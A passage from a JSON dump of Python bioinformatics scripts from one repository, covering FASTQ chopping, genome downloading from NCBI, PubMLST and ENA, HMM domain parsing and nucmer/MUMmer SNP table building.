True\n# \n# while(inblock):\n# temp = source.readline()\n# # print temp\n# if (re.match(\"@\" + identifier + \".*?\\n\", temp) or temp == \"\"):\n# inblock = False\n# if not currentblock.seqid == \"\":\n# currentblock.write(product)\n# nextblockid = temp.rstrip('\\n')\n# \n# else:\n# currentblock.addRaw(temp.rstrip('\\n'))\n# \n# if temp == \"\":\n# eof = True \n \n\n\nif __name__ == '__main__':\n #modify these as needed\n directory = input(\"Please specify working directory, in full \\n\")\n identifier = input(\"Please input sequence identifier, not including the @ symbol \\n\")\n length = eval(input(\"Please specify the length of moving window \\n\"))\n overlap = eval(input(\"Please specify the length of overlap \\n\"))\n \n #Do not modify\n os.chdir(directory) \n \n if not (os.path.isdir(directory + \"/Chopped\")):\n os.mkdir(\"Chopped\")\n \n chopdirectory = directory + \"/Chopped\"\n \n log = open(chopdirectory + \"/log.txt\", \"w\")\n log.write(\"Run inputs are: \\n%s\\n%s\\n%s\\n%s\\n\" % (directory, identifier, length, overlap))\n \n onlyfiles = [ f for f in listdir(directory) if isfile(join(directory,f)) ]\n for f in onlyfiles:\n print(\"\\nProcessing %s ...\" % f)\n log.write(\"\\nProcessing %s ... \" % f)\n \n try: \n namesplit = f.split(\".\")\n if namesplit[len(namesplit)-1] == \"fq\":\n chop(directory, chopdirectory, f, identifier, length, overlap, log)\n else:\n log.write(\"\\nerror, %s is not a fq file\" % f)\n except:\n log.write(\"\\nerror, %s is not a fq file\" % f)\n \n \n print(\"\\nend of script\")"
},
{
"alpha_fraction": 0.4599524140357971,
"alphanum_fraction": 0.46629658341407776,
"avg_line_length": 28.547618865966797,
"blob_id": "ae41f63e94889ef7e2afa14bddb4fe442ffdfbec",
"content_id": "0c5c9ab6a5b7d88e2e446e61078eca6aa65969e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 42,
"path": "/misc/NCBIExtractor.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Mar 15, 2017\n\nCompanion of NCBIDownloader, extracts the fastas generated\n\n@author: javi\n'''\n\nif __name__ == '__main__':\n \n from os import chdir, mkdir, scandir\n import re\n from subprocess import check_output\n \n directory = '/data/new/javi/neis/ngo2'\n outpath = '/data/new/javi/neis/ngo_fasta'\n \n chdir(directory)\n \n try:\n mkdir(outpath)\n except Exception:\n print(Exception)\n \n for entry in scandir():\n \n if entry.is_dir():\n \n files = scandir(entry.name)\n name = re.sub(' ', '', entry.name) + '.fasta'\n \n for file in files:\n fn = file.name\n if not (re.search('_cds_', fn) or re.search('_rna_', fn)) and fn.endswith('genomic.fna.gz'):\n print(fn)\n fsa = check_output(['gzip', '-cd', '/'.join([entry.name, fn])])\n# print(' '.join(['gzip', '-cd', '/'.join([entry.name, fn]), '|', 'cat', '>', '/'.join([outpath, name])]))\n \n with open('/'.join([outpath, name]), 'w') as output:\n output.write(fsa.decode(\"utf-8\"))\n break\n print('Done!')\n "
},
{
"alpha_fraction": 0.6269875168800354,
"alphanum_fraction": 0.6407391428947449,
"avg_line_length": 32.014183044433594,
"blob_id": "e196c67fc24e7b7320bbbdf42461675d438276e0",
"content_id": "3f3136eee7344cd414177bd3f756982d5c775813",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4654,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 141,
"path": "/Proteins/DomainFamily.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 13, 2014\n\n@author: javi\n'''\n\n'''contains routines for choosing the best family from HMM searches using different\nprofiles. '''\nimport re\n\n\n'''tree, tree -> tree\nmerges the information in target and source, which represent\nsearch result using two profiles. Picks the best family of the two'''\ndef update(new, current):\n for proteinID, proteinInfo in new.items():\n if proteinID in current:\n for domain, score in proteinInfo.items():\n current[proteinID] = updateDomains(score, current[proteinID])\n else:\n current[proteinID] = proteinInfo\n return current\n\n'''tuple, dict -> dict\nprimary method for updating a domain. runs the other parts'''\ndef updateDomains(newDomain, currentProtein):\n decision = choosePosition(newDomain, currentProtein)\n if decision[1] == True:\n score = newDomain[1]\n oldScore = currentProtein[decision[0]][1]\n if score < oldScore: #smaller score is better\n currentProtein[decision[0]] = newDomain\n else:\n currentProtein = place(newDomain, currentProtein, decision[0])\n return currentProtein\n \n \n'''tuple, dict, int -> dict\nplaces the given domain at the appropriate index, and update all other indices'''\ndef place(newDomain, oldDomains, index):\n for domain in sorted(oldDomains.keys()[index-1:], reverse=True):\n oldDomains[domain+1] = oldDomains[domain]\n oldDomains[index] = newDomain\n return oldDomains\n\n'''int, list of ints -> int\nreturns a or b, whichever one is closer to the query'''\ndef closest(query, list):\n results = [(abs(query-x), index) for index, x in enumerate(list)]\n return list[sorted(results)[0][1]]\n\n'''tuple, dict -> (int, bool)\nreturns the index of where it should go, and whether its a replace or insert (True for replace)'''\ndef choosePosition(newDomain, currentProtein):\n oldCoords = [x[1][2] for x in sorted(currentProtein.items())]\n newCoords = newDomain[2]\n \n starts = [x[0] for x in oldCoords]\n ends = [x[1] for x in oldCoords]\n \n startClosest = closest(newCoords[0], starts+ends)\n endClosest = closest(newCoords[1], starts+ends)\n \n #prediction based on start\n if startClosest in starts:\n sPrediction = (starts.index(startClosest)+1, True)\n else:\n sPrediction = (ends.index(startClosest)+2, False)\n \n #prediction based on end\n if endClosest in ends:\n ePrediction = (ends.index(endClosest)+1, True)\n else:\n ePrediction = (starts.index(endClosest)+1, False)\n\n #pick one\n \n #ends\n if startClosest == endClosest:\n if startClosest in starts:\n return ePrediction\n elif endClosest in ends:\n return sPrediction\n #both predictions would be wrong\n elif newCoords[0] < startClosest and newCoords[1] > endClosest:\n return (sPrediction[0], True)\n elif sPrediction == ePrediction:\n return sPrediction\n elif startClosest in starts:\n return sPrediction\n elif endClosest in ends:\n return ePrediction\n else:\n raise Exception('unable to choose')\n\n\n'''list of trees -> tree\n\nrefer to HMMParser for the tree structure. \nMain running method for choosing the best family'''\ndef choose(treeList):\n base = treeList[0]\n others = treeList[1:]\n for other in others:\n base = update(other, base)\n return base\n\n'''tree -> None(print)\n\nprints a tree to file in a legible format'''\ndef printTree(tree, filepath):\n with open(filepath, \"w\") as output:\n count = 0\n for proteinID, proteinInfo in tree.items():\n output.write(\">>{0}\\n\".format(proteinID))\n count += 1\n for domain, info in proteinInfo.items():\n family, score, length, cys, degen = info\n output.write(\"\\tDomain {0:>3} Family {1} Coords {3:>7} Cys {4:>2} Degen {5:>5} Score {2}\\n\".format(domain, family, score, \"-\".join([str(length[0]),str(length[1])]), cys, str(degen)))\n print(\"{0} has {1} proteins\".format(re.match(\"^.+/(.+?)$\", filepath).group(1), count))\n \n# '''tree -> tree\n# \n# prunes the current tree according to rules. Current rules are two of the three from the paper:\n# \n# e-value < 1e-5\n# at least 90 in length\n# '''\n# def prune(tree):\n# for proteinID, proteinInfo in tree.items():\n# for domainID, domainInfo in proteinInfo.items():\n# score = domainInfo[1]\n# length = domainInfo[2]\n# if score > 0.00001 or length < 90:\n# del tree[proteinID][domainID]\n\n'''trees -> None (output)\n\ncomputes some stats about this tree'''\ndef summary(tree):\n pass"
},
{
"alpha_fraction": 0.5399484634399414,
"alphanum_fraction": 0.5644329786300659,
"avg_line_length": 24.733333587646484,
"blob_id": "037b9692fdc229472e571458609c3abc01d6c0a4",
"content_id": "d21283a84de828e355348eff8ffa6de3d97741b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 30,
"path": "/misc/MergePaired.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Feb 16, 2018\n\n@author: javi\n'''\nimport subprocess\nimport os\nimport re\n\nif __name__ == '__main__':\n \n flash_path = \"/home/javi/ProgramFiles/FLASH-1.2.11/flash\"\n directory = \"/data/new/javi/neis/ngo4/N20\" #change as needed\n format = \"^(.+)[_]R[12].fastq\"\n outpath = directory + \"/merged\"\n \n if not os.path.isdir(outpath): os.mkdir(outpath)\n \n names = set([re.match(format, x).groups(1)[0] for x in os.listdir(directory) if re.match(format, x)])\n \n print(names)\n \n os.chdir(directory)\n \n for name in names:\n with open(\"./merged/\" + name + \".fastq\", 'w') as f:\n args = [flash_path, name + \"_R1.fastq\", name + \"_R2.fastq\", \"-c\"]\n subprocess.call(args, stdout = f)\n \n print(\"done.\")\n "
},
{
"alpha_fraction": 0.5440582036972046,
"alphanum_fraction": 0.5529506802558899,
"avg_line_length": 22.711538314819336,
"blob_id": "8e101a7dab39fa229448484842e859c329a83aae",
"content_id": "cfe086a2586631fdd34eedffe3b4f25031d56aa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 52,
"path": "/misc/PubMLSTDownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Mar 15, 2017\n\nDownloads some genomes from ncbi using a .csv table file\n\n@author: javi\n'''\nimport re \nfrom subprocess import call\nfrom os import chdir\n\ndef parseCSV(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n entries = []\n \n for line in re.split('\\n', data):\n if line == '': \n continue\n \n entries.append([re.sub(r'^\"|\"$', '', s) for s in re.split(',', line)]) #strips quotes\n \n legend = entries.pop(0)\n \n return legend, entries\n\n\ndef download(info):\n #downloads files gives a parsed table of info\n base_url = 'https://pubmlst.org/bigsdb?db=pubmlst_neisseria_isolates&page=downloadSeqbin&isolate_id='\n id_index = 0\n name_index = 1\n\n \n for entry in info:\n if '/' in entry[name_index]:\n url = base_url + str(entry[id_index])\n name = re.split('/', entry[name_index])[0]\n call(['wget', '-O', '{}.fasta'.format(name), url])\n print(name)\n\nif __name__ == '__main__':\n \n directory = '/data/new/javi/neis'\n table = 'ids.csv'\n out = 'seqs'\n \n chdir('/'.join([directory, out]))\n info = parseCSV('/'.join([directory, table]))\n download(info[1])\n "
},
{
"alpha_fraction": 0.5830671191215515,
"alphanum_fraction": 0.5963791012763977,
"avg_line_length": 26.101449966430664,
"blob_id": "2157d345944ea14b88a7f3c057be93b84c997b98",
"content_id": "d3106aa0a35ffea9accd5806680fa994865fb5f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1878,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 69,
"path": "/misc/ngo_fasta.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 24, 2018\n\nmakes snps files using nucmer\n\n@author: Javi\n'''\nimport os\nimport re\nfrom multiprocessing import Pool\nimport subprocess as sp\n\ndef nucmer(file, ref, outpath):\n \n name = findName(file)\n \n if name+'.snps' in os.listdir(outpath):\n print(name+\" is already done!\")\n return\n \n nuc_command = ['nucmer', '--prefix='+name, ref, file]\n filter_command = ['delta-filter', '-r', '-q', name+'.delta', '>', name+'.filter']\n snps_command = ['show-snps', '-Clr', name+'.filter', '>', outpath+'/'+name+'.snps']\n \n print(name+': starting nucmer')\n nuc_result = sp.run(nuc_command, stderr=sp.STDOUT, stdout=sp.PIPE, encoding='UTF-8')\n print(nuc_result.stdout)\n \n print(name+': starting filter')\n filter_result = sp.run(' '.join(filter_command), shell = True, stderr=sp.STDOUT, stdout=sp.PIPE, encoding='UTF-8')\n print(filter_result.stdout)\n \n print(name+': starting show-snps')\n snps_result = sp.run(' '.join(snps_command), shell = True, stderr=sp.STDOUT, stdout=sp.PIPE, encoding='UTF-8')\n print(snps_result.stdout)\n\n#use if you need to alter the name for formatting. specific to each data set.\ndef findName(raw):\n\n pattern = '^PRO1650_(.+?)_'\n pattern2 = '(.+?).fasta'\n try:\n name = re.match(pattern, raw).group(1)\n except:\n name = re.match(pattern2, raw).group(1)\n \n return name\n \n\nif __name__ == '__main__':\n \n directory = '/data/new/javi/neis/ngo4/N20/merged/fasta'\n outpath = 'snps'\n logpath = 'log.txt'\n ref = 'FA1090.fasta' \n files = [x for x in os.listdir(directory) if x.endswith('fasta')]\n print(files)\n os.chdir(directory)\n \n try:\n os.mkdir(outpath)\n except:\n pass\n \n \n \n \n with Pool(processes=4) as pool:\n pool.starmap(nucmer, [(x, ref, outpath) for x in files])\n "
},
{
"alpha_fraction": 0.4166666567325592,
"alphanum_fraction": 0.5,
"avg_line_length": 8.5,
"blob_id": "ed9ede5451aaaa04169484651cdfc83c8cc33583",
"content_id": "1e3805407ff6710bc543fb1e3b517b315d936a1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 6,
"path": "/Proteins/FilterHammodia.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 19, 2014\n\n@author: javi\n'''\nimport re \n\n\n "
},
{
"alpha_fraction": 0.5293489694595337,
"alphanum_fraction": 0.5448238849639893,
"avg_line_length": 29.278688430786133,
"blob_id": "a0315240ceba9151972cb3f6639708b86e0f220e",
"content_id": "f0927066059aec7073ef906549dcb5962577bbf3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1874,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 61,
"path": "/Proteins/HMMParser.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 13, 2014\n\n@author: javi\n'''\n'''Container script for HMM parsing routines'''\nimport re\nimport numpy\n\n'''filepath -> dictionary of nested dictionary\nreads a hmm search file and get the protein domain scores.\n\nreturn structure\n\n{proteinID : {domainID: (family, score)}}\n'''\ndef read(filepath, family):\n results = {}\n pattern = re.compile('>> (.+?)\\n\\n(?=>>|\\n)', re.DOTALL)\n \n with open(filepath) as f:\n fStr = f.read()\n matches = re.findall(pattern, fStr)\n for block in matches:\n pid, domainScores = parseBlock(block, family)\n if len(domainScores) > 0:\n results[pid] = domainScores\n \n print(str(len(matches)) + \" proteins from \" + filepath + \" from \" + family + \" read.\")\n return results\n \n'''string -> nested dict\ngiven a block representing one protein, parse info into {name: {domainnum : (family, score, length, cys, degenerate)}}'''\ndef parseBlock(block, family):\n results = {}\n name = re.match(\"(.+)\\s\", block).group(1)\n \n \n domains = re.search(\"(?s)^.*?----\\n (.+)(?=\\n\\n Alignments)\", block).group(1).split(\"\\n \")\n domSeqs = re.split(\"==\", block)[1:]\n \n count = 1\n for domain, domSeq in zip(domains, domSeqs):\n fields = re.split(\"[\\s]+\", domain)\n score = float(fields[5])\n coords = (int(fields[9]), int(fields[10]))\n sequence = \"\".join(re.findall(\"{0}\\s+\\d+\\s+(.*?)\\s.*?\".format(re.split(\" \", name)[0]), domSeq))\n cys = sequence.upper().count(\"C\")\n \n if score > 0.00001 or coords[1] - coords[0] < 90:\n continue\n \n if cys < 4:\n degenerate = True\n else:\n degenerate = False\n \n results[count] = (family, score, coords, cys, degenerate)\n count += 1\n \n return name, results\n \n \n \n "
},
{
"alpha_fraction": 0.6323684453964233,
"alphanum_fraction": 0.6365789771080017,
"avg_line_length": 37.292930603027344,
"blob_id": "2bceb9c5fbff5fb613e8c56ef5a816aef51ed69b",
"content_id": "2f03b949d26d41e3ddac5ac705d7280f6bafbe7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3800,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 99,
"path": "/Proteins/ProteinRunner.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 13, 2014\n\n@author: javi\n'''\nimport Proteins.HMMParser as hmp\nimport Proteins.DomainFamily as dmf\nimport Proteins.SequenceSelect as ss\nimport Proteins.SRSCytoscape as srsce\nimport Proteins.Chartmaker as cm\nimport os\nimport re\n\n\nif __name__ == '__main__':\n# #Job: merging multiple hmm families. This script specifically deals with the file/folder structure.\n# directory = \"/data/javi/Proteins/results\"\n# resultPath = \"/data/javi/Proteins/HMMResolved\"\n# try:\n# os.mkdir(resultPath)\n# except:\n# pass\n# \n# print(\"reading data\")\n# data = {}\n# for dir in os.walk(directory).next()[1]:\n# family = dir\n# path = \"/\".join([directory, dir])\n# files = [ x for x in os.listdir(path) if os.path.isfile(\"/\".join([path,x]))]\n# for file in files:\n# strain = re.split(\"\\.\",file)[0]\n# if strain not in data:\n# data[strain] = []\n# data[strain].append(hmp.read(\"/\".join([path, file]), family))\n# \n# print(\"analyzing\")\n# results = {}\n# for strain, info in data.items():\n# print(\"resolving strain: \" + strain)\n# results[strain] = dmf.choose(info)\n# dmf.printTree(results[strain], \"{0}/{1}.hmmr\".format(resultPath, strain))\n# \n# \n# print(\"HMM reorganiation completed.\")\n# \n# # Job: selecting all the found sequences from fasta file.\n# hmmrDirectory = \"/data/javi/Proteins/HMMResolved\"\n# fastaDirectory = \"/data/javi/Proteins\"\n# outputDirectory = \"/data/javi/Proteins/SelectedFastas\"\n# \n# hmmrFiles = [ x for x in os.listdir(hmmrDirectory) if os.path.isfile(\"/\".join([hmmrDirectory, x]))]\n# for hmmr in hmmrFiles:\n# print(\"selecting proteins for {0}\".format(hmmr))\n# strain = re.match(\"^(.+?).hmmr\", hmmr).group(1)\n# hmmrpath = \"/\".join([hmmrDirectory, hmmr])\n# fastapath = \"/\".join([fastaDirectory, strain + \".aa.fsa\"])\n# outpath = \"/\".join([outputDirectory, strain + \".hits.fasta\"])\n# ss.select(hmmrpath, fastapath, outpath, strain)\n# print(\"selection completed\")\n\n\n# #Job: filtering out hammodia\n# filepath=\"/data/javi/Proteins/orthoMCL/final.txt\"\n# outpath=\"/data/javi/Proteins/orthoMCL/noHam.txt\"\n# ss.filter(filepath, outpath)\n# print(\"done filtering\")\n\n# #Job: changing the names.\n# filepath=\"/data/javi/Proteins/orthoMCL/groups.txt\"\n# outpath=\"/data/javi/Proteins/orthoMCL/named.csv\"\n# hmmrDirectory=\"/data/javi/Proteins/HMMResolved\"\n# ss.toName(filepath, hmmrDirectory, outpath)\n\n# #Job: cytoscape encoding\n# filepath=\"/data/javi/Proteins/orthoMCL/groups.txt\"\n# outpath=\"/data/javi/Proteins/SRSCytoscape.xgmml\"\n# hmmDirectory=\"/data/javi/Proteins/HMMResolved\"\n# clusters = srsce.loadClusters(filepath)\n# cytotext = srsce.encode(clusters, hmmDirectory, 'SRS Proteins')\n# with open(outpath, 'w') as output:\n# output.write(cytotext)\n# print(\"cytoscape file completed.\")\n\n# #job: Make distrubution chart\n# filepath=\"/data/javi/Proteins/orthoMCL/groups.txt\"\n# outpath=\"/data/javi/Proteins/chart.csv\"\n# hmmrDirectory=\"/data/javi/Proteins/HMMResolved\"\n# clusters = srsce.loadClusters(filepath)\n# domains = srsce.getNodeDomains(hmmrDirectory)\n# translated = cm.translateMatrix(clusters, domains)\n# data = cm.distributionChart(translated[0], translated[1])\n# cm.printDistributionChart(data[0], data[1], outpath)\n \n #job: Make domainsstats chart\n outpath=\"/data/javi/Proteins/domainStat.csv\"\n hmmrDirectory=\"/data/javi/Proteins/HMMResolved\"\n composition = srsce.getNodeDomains(hmmrDirectory)\n data = cm.domainStats(composition)\n cm.printDomainStats(data, outpath)\n \n "
},
{
"alpha_fraction": 0.5834625363349915,
"alphanum_fraction": 0.5870801210403442,
"avg_line_length": 27.761194229125977,
"blob_id": "d36048f4c1458faec8baacbb1aa5ff63b6262978",
"content_id": "2f6d110c8033e23665bcb034eea013ceb0d529e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1935,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 67,
"path": "/ConsensusChopper/FqBlock.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Sep 17, 2013\n\n@author: javi\n'''\n#Temporarily holds a fastq block prior to writing into the file.\n#Starts out blank\n#Sequence and qscores are kept separately, and are both extensible. You can't really delete though.\n\nimport re\n\nclass FqBlock:\n '''\n classdocs\n '''\n\n\n def __init__(self, blocklength, overlap):\n self.sequence = \"\"\n self.qscore = \"\"\n self.seqid = \"\"\n self.blocklength = blocklength\n self.overlap = overlap\n \n def build(self):\n #This is the main part of the class. Takes the original block and \n #outputs the block divided into X basepair blocks with Y overlap on either side. \n \n tempseqlist = []\n tempqscorelist = []\n \n while(len(self.sequence) > self.blocklength):\n tempseqlist.append(self.sequence[:self.blocklength])\n self.sequence = self.sequence[self.blocklength-self.overlap:]\n tempqscorelist.append(self.qscore[:self.blocklength])\n self.qscore = self.qscore[self.blocklength-self.overlap:]\n \n tempseqlist.append(self.sequence)\n tempqscorelist.append(self.qscore)\n \n output = \"\"\n for x in range (0, len(tempseqlist)):\n output = output + \"%s %d\\n%s\\n+\\n%s\\n\" % (self.seqid, x, tempseqlist[x], tempqscorelist[x])\n \n# print output\n return output\n \n def write(self, output):\n output.write(self.build())\n \n def setSequence(self, newsequence):\n self.sequence = newsequence \n \n def setQscore(self, newqscore):\n self.qscore = newqscore\n \n def addRaw(self, newraw):\n self.raw = self.raw + newraw\n \n def setSeqid(self, newseqid):\n self.seqid = newseqid\n \n def __print(self):\n print(self.build())\n \n def reset(self):\n self.__init__(self.blocklength, self.overlap)\n "
},
{
"alpha_fraction": 0.5308164954185486,
"alphanum_fraction": 0.5421878695487976,
"avg_line_length": 32.02325439453125,
"blob_id": "e67f46d836efd1f83ae67243e0d39c0e7f2003c0",
"content_id": "80765a22b27f2eea0d32c5460a7f02d48aaaea46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4397,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 129,
"path": "/misc/MummerTable.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on May 8, 2018\r\n\r\n@author: Javi\r\n'''\r\nimport re\r\nimport os\r\nimport ChrTranslator as ct\r\nimport ChrNameSorter as cns\r\nimport sys\r\n\r\ndef addData(f, sampleName, dataTree, reference, organism):\r\n \r\n totalCount = 0\r\n disregardCount = 0\r\n type = 'snps'\r\n\r\n try:\r\n data = f.read()\r\n noHeader = re.search(fetchRegexPattern(f.name), data).group(1)\r\n except Exception as e:\r\n print(\"header parsing error in %s: %s\" % (f.name, str(e)))\r\n sys.exit()\r\n \r\n #Divide the remaining data into lines\r\n rawLines = re.split(\"\\n\", noHeader)\r\n parsed = []\r\n #Parsing lines\r\n for line in rawLines[:-1]:\r\n totalCount += 1\r\n temp = organizeLine(line, sampleName, type, organism)\r\n \r\n #modified for euks!\r\n if temp is not None and re.search('CHR', temp[0]):\r\n parsed.append(temp)\r\n elif temp is None:\r\n disregardCount += 1\r\n \r\n#Add the parsed data to the dataTree \r\n for dataPoint in parsed:\r\n \r\n #Ensures that the branch this data line refers exists.\r\n #If not, create it \r\n currentLevel = dataTree\r\n for branchName in dataPoint[:2]:\r\n if branchName not in currentLevel:\r\n currentLevel[branchName] = {}\r\n currentLevel = currentLevel[branchName]\r\n #Adds the SNP value to the tree\r\n currentLevel[dataPoint[-3]] = dataPoint[-2]\r\n if reference not in currentLevel:\r\n currentLevel[reference] = dataPoint[-1]\r\n \r\n print(\"{0!s} disregarded out of {1!s} total\".format(disregardCount, totalCount))\r\n \r\n return dataTree\r\n\r\ndef fetchRegexPattern(name):\r\n print(\"fetching RegEx for %s\" % name)\r\n if name.endswith(\".snps\"):\r\n return \"(?s)^.*?=\\n(.*)\"\r\n else:\r\n return \"(?sm)^([^#].*)\"\r\n \r\n \r\ndef organizeLine(rawLine, name, type, organism):\r\n \r\n lineSplit = re.split(\"\\s+\",rawLine)\r\n try:\r\n if type is 'snps':\r\n chr = ct.translate(lineSplit[14].upper(), mode=organism)#for plasmo aligned from 3D7\r\n ref = lineSplit[2].upper()\r\n snp = lineSplit[3].upper()\r\n indel = len(ref) > 1 or len(snp) > 1 or re.search('[^AGCT]', ref) or re.search('[^AGCT]', snp)\r\n pos = int(lineSplit[1])\r\n if not indel:\r\n return [chr, pos, name, snp, ref]\r\n else:\r\n return None\r\n else:\r\n chr = ct.translate(lineSplit[0].upper(), mode=organism).upper()\r\n indel = len(lineSplit[3]) > 1 or len(lineSplit[4]) > 1 or re.search('[^AGCT]', lineSplit[3]) or re.search('[^AGCT]', lineSplit[4])\r\n hetero = re.search(\"1/1\", lineSplit[9])\r\n quality = float(lineSplit[5])\r\n pos = int(lineSplit[1])\r\n snp = lineSplit[4].upper()\r\n ref = lineSplit[3].upper()\r\n #choice of 5 as a quality min is a bit arbitrary\r\n if hetero and not indel and quality > 0:\r\n return [chr, pos, name, snp, ref] \r\n else:\r\n return None\r\n except Exception as e:\r\n print(\"Illegal Line in file %s: %s\" % (name, e))\r\n print(lineSplit)\r\n\r\ndef output(f, dataTree, sampleList, organism, reference):\r\n \r\n sampleList = sorted(sampleList)\r\n \r\n with open(f, 'w') as output:\r\n header = '\\t'.join(['#CHROM', 'POS'] + sampleList) + '\\n'\r\n output.write(header)\r\n \r\n for chr in sorted(dataTree.keys(), key=lambda x: cns.getValue(x, organism)):\r\n for pos in dataTree[chr]:\r\n d = dataTree[chr][pos]\r\n line = '\\t'.join([chr, str(pos)] + [d[x] if x in d else d[reference] for x in sampleList]) + '\\n'\r\n output.write(line)\r\n\r\nif __name__ == '__main__':\r\n path = 'D:/Documents/data/neis/snps5'\r\n outpath = 'D:/Documents/data/neis/neis5.tsv'\r\n organism = 'strep'\r\n reference = 'FA1090'\r\n sampleList = []\r\n \r\n dataTree = {}\r\n os.chdir(path)\r\n \r\n files = [x for x in os.listdir(path) if x.endswith('.snps')]\r\n for f in files:\r\n name = f[:-5]\r\n sampleList.append(name)\r\n with open(f, 'r') as input:\r\n dataTree = addData(input, name, dataTree, reference, organism)\r\n \r\n output(outpath, dataTree, sampleList, organism, reference)\r\n print('Mummer Table Completed')\r\n "
},
{
"alpha_fraction": 0.6183844208717346,
"alphanum_fraction": 0.623756468296051,
"avg_line_length": 28.922618865966797,
"blob_id": "546db7a68ecd5c0d4e5dc64566768886f4d4e391",
"content_id": "a0f69690b18abf801aa331dafa3bab3f51836b8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5026,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 168,
"path": "/misc/ENADownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan. 2, 2019\n\n@author: Javi\n'''\nimport requests\nimport sys\nimport xml.etree.ElementTree as xml\nimport multiprocessing as mp\nimport subprocess as sub\nimport os.path\nimport os\nimport pandas\nimport numpy as np\nimport logging\nimport re\nfrom datetime import datetime as dt\n\n\ndef getAcc(sec_acc):\n '''\n returns the run accession from the secondary accession. if there are multiple we return the last one. Probably the best one?\n '''\n \n print('getting acc for ' + sec_acc)\n template = \"https://www.ebi.ac.uk/ena/data/view/{0}&display=xml\"\n \n res = requests.get(template.format(sec_acc)).content\n \n root = xml.fromstring(res)\n \n try:\n for child in root.find('SAMPLE').find('SAMPLE_LINKS'):\n if child.find('XREF_LINK').find('DB').text == 'ENA-RUN':\n return child.find('XREF_LINK').find('ID').text.strip().split(',')[-1] #we're going to return only the last accession. Hopefully this works. \n except AttributeError:\n return None\n\n \ndef downloadSample(downloader_path, output_path, acc):\n '''\n process one sample. we're going to assume it's just one acc.\n it's actually impractical to do more than 1.\n '''\n \n print('downloading ' + str(acc))\n \n def getPath(acc, n):\n '''gets the full path for an accession, for cat purposes.\n n means the first or second file'''\n \n return os.path.join(output_path, acc, acc, \"{0}_{1}.fastq.gz\".format(acc, str(n)))\n \n def getFinalPath(acc, n):\n '''\n so it turns out we had to have the downloader go one level deeper.\n then we want to move the file back up\n '''\n return os.path.join(output_path, acc, \"{0}_{1}.fastq.gz\".format(acc, str(n)))\n\n sub.run([downloader_path, '-f', 'fastq', '-d', os.path.join(output_path, acc), acc])\n \n os.rename(getPath(acc, 1), getFinalPath(acc, 1))\n os.rename(getPath(acc, 2), getFinalPath(acc, 2))\n os.rmdir(os.path.join(output_path, acc, acc))\n \n logging.info(acc) #TODO\n\ndef downloadSampleStar(params):\n return downloadSample(*params)\n\ndef checkForCompletion(log, acc):\n '''\n checks if this acc is in the log. Return true if not there.\n '''\n if re.search(acc, log):\n print(acc + ' already done!')\n return False\n return True\n\ndef loadTable(input_path):\n '''\n this function will return a table with the column accs from the original 'accession' column\n the accs is always an ndarray. \n '''\n \n def accHelper(sec_accs):\n arr = [getAcc(sec_acc.strip()) for sec_acc in sec_accs.split(',')]\n return np.array(arr)\n \n df = pandas.read_csv(input_path, sep='\\t')\n df['accs'] = df['accession'].apply(accHelper)\n \n #filter out rows where we have no run accs\n df = df.loc[df['accs'].notnull()]\n return df\n\ndef configLogger(path):\n \n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n \n fh = logging.FileHandler(path)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: \\n %(message)s \\n')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n \n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.INFO)\n logger.addHandler(sh)\n\n\ndef run(downloader_path, input_path, output_path):\n \n log_path = os.path.join(output_path, 'log.txt')\n acc_path = os.path.join(output_path, 'accs.pkl')\n \n configLogger(log_path)\n \n if not os.path.isfile(acc_path):\n #if this is not a restart, read tsv and make it a hdf\n acc_df = loadTable(input_path) \n acc_df.to_pickle(acc_path)\n else:\n acc_df = pandas.read_pickle(acc_path)\n \n # print(acc_df)\n #get accs of the ones we need to run, then flatten\n 